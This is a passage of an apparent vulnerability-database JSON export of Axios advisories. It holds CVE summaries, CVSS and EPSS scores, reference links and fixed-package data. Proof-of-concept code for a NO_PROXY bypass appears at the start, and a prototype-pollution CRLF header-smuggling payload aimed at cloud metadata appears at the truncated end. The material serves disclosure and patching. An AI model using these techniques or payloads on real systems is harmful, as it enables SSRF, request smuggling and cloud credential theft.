res.end(\"proxied\");\n}).listen(proxyPort, () => console.log(\"Proxy\", proxyPort));\n\nprocess.env.HTTP_PROXY = `http://127.0.0.1:${proxyPort}`;\nprocess.env.NO_PROXY = \"localhost,127.0.0.1,::1\";\n\nasync function test(url) {\n try {\n await axios.get(url, { timeout: 2000 });\n } catch {}\n}\n\nsetTimeout(async () => {\n console.log(\"\\n[*] Testing http://localhost.:8080/\");\n await test(\"http://localhost.:8080/\"); // goes through proxy\n\n console.log(\"\\n[*] Testing http://[::1]:8080/\");\n await test(\"http://[::1]:8080/\"); // goes through proxy\n}, 500);\n```\n\n**Expected:** Requests bypass the proxy (direct to loopback).\n**Actual:** Proxy logs requests for `localhost.` and `[::1]`.\n\n---\n\n**Impact**\n\n* Applications that rely on `NO_PROXY=localhost,127.0.0.1,::1` for protecting loopback/internal access are vulnerable.\n* Attackers controlling request URLs can:\n\n * Force Axios to send local traffic through an attacker-controlled proxy.\n * Bypass SSRF mitigations relying on NO\\_PROXY rules.\n * Potentially exfiltrate sensitive responses from internal services via the proxy.\n \n \n---\n\n**Affected Versions**\n\n* Confirmed on Axios **1.12.2** (latest at time of testing).\n* affects all versions that rely on Axios’ current `NO_PROXY` evaluation.\n\n---\n\n**Remediation**\nAxios should normalize hostnames before evaluating `NO_PROXY`, including:\n\n* Strip trailing dots from hostnames (per RFC 3986).\n* Normalize IPv6 literals by removing brackets for matching.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62718","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0334","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.0329","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03312","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.09709","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.09679","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10426","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10437","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10371","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12512","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.12953","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-62718"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718"},{"reference_url":"https://datatracker.ietf.org/doc/html/rfc1034#section-3.1","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://datatracker.ietf.org/doc/html/rfc1034#section-3.1"},{"reference_url":"https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c"},{"reference_url":"https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df"},{"reference_url":"https://github.com/axios/axios/pull/10661","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/pull/10661"},{"reference_url":"https://github.com/axios/axios/pull/10688","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/pull/10688"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.31.0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.31.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.15.0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.15.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62718","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-62718"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456913","reference_id":"2456913","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2456913"},{"reference_url":"https://github.com/advisories/GHSA-3p68-rc4w-qgx5","reference_id":"GHSA-3p68-rc4w-qgx5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3p68-rc4w-qgx5"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10175","reference_id":"RHSA-2026:10175","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10175"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13571","reference_id":"RHSA-2026:13571","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13571"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13826","reference_id":"RHSA-2026:13826","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13826"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8483","reference_id":"RHSA-2026:8483","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8483"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8484","reference_id":"RHSA-2026:8484","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8484"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8490","reference_id":"RHSA-2026:8490","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8490"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8491","reference_id":"RHSA-2026:8491","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8491"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8493","reference_id":"RHSA-2026:8493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:9742","reference_id":"RHSA-2026:9742","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:9742"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2025-62718","GHSA-3p68-rc4w-qgx5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-axk7-6q4b-vuga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354418?format=json","vulnerability_id":"VCID-cj5w-7hbe-wqex","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42034.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42034","reference_id":"","reference_type":"","scores":[{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11525","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00039","scoring_system":"epss","scoring_elements":"0.11627","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15633","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42034"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42034"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461623","reference_id":"2461623","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461623"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42034","reference_id":"CVE-2026-42034","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42034"},{"reference_url":"https://github.com/advisories/GHSA-5c9x-8gcm-mpgx","reference_id":"GHSA-5c9x-8gcm-mpgx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5c9x-8gcm-mpgx"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx","reference_id":"GHSA-5c9x-8gcm-mpgx","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:12:43Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42034","GHSA-5c9x-8gcm-mpgx"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cj5w-7hbe-wqex"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354609?format=json","vulnerability_id":"VCID-drqq-9mkv-qkbx","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, an attacker who can influence the target URL of an Axios request can use any address in the 127.0.0.0/8 range (other than 127.0.0.1) to completely bypass the NO_PROXY protection. This vulnerability is due to an incomplete for CVE-2025-62718, This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42043.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42043","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.0749","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09635","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13086","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42043"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42043"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461626","reference_id":"2461626","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461626"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42043","reference_id":"CVE-2026-42043","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42043"},{"reference_url":"https://github.com/advisories/GHSA-pmwg-cvhr-8vh7","reference_id":"GHSA-pmwg-cvhr-8vh7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pmwg-cvhr-8vh7"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7","reference_id":"GHSA-pmwg-cvhr-8vh7","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:47:20Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-pmwg-cvhr-8vh7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42043","GHSA-pmwg-cvhr-8vh7"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-drqq-9mkv-qkbx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354605?format=json","vulnerability_id":"VCID-e86t-8z3n-sqgd","summary":"Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.1, the FormDataPart constructor in lib/helpers/formDataToStream.js interpolates value.type directly into the Content-Type header of each multipart part without sanitizing CRLF (\\r\\n) sequences. An attacker who controls the .type property of a Blob/File-like object (e.g., via a user-uploaded file in a Node.js proxy service) can inject arbitrary MIME part headers into the multipart form-data body. This bypasses Node.js v18+ built-in header protections because the injection targets the multipart body structure, not HTTP request headers. This vulnerability is fixed in 1.15.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42037","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12339","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14178","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.18753","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42037"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461636","reference_id":"2461636","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461636"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42037","reference_id":"CVE-2026-42037","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42037"},{"reference_url":"https://github.com/advisories/GHSA-445q-vr5w-6q77","reference_id":"GHSA-445q-vr5w-6q77","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-445q-vr5w-6q77"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77","reference_id":"GHSA-445q-vr5w-6q77","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:36:52Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42037","GHSA-445q-vr5w-6q77"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e86t-8z3n-sqgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/351355?format=json","vulnerability_id":"VCID-ek49-tuj4-t3ap","summary":"Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain\n\n## Summary\nThe Axios library is vulnerable to a specific \"Gadget\" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).\n\nWhile Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.\n\n**Severity**: Critical (CVSS 9.9)\n**Affected Versions**: All versions (v0.x - v1.x)\n**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)\n\n## Usage of \"Helper\" Vulnerabilities\nThis vulnerability is unique because it requires **Zero Direct User Input**.\nIf an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.\n\nBecause Axios does not sanitise these merged header values for CRLF (`\\r\\n`) characters, the polluted property becomes a **Request Smuggling** payload.\n\n## Proof of Concept\n\n### 1. The Setup (Simulated Pollution)\nImagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:\n```javascript\nObject.prototype['x-amz-target'] = \"dummy\\r\\n\\r\\nPUT 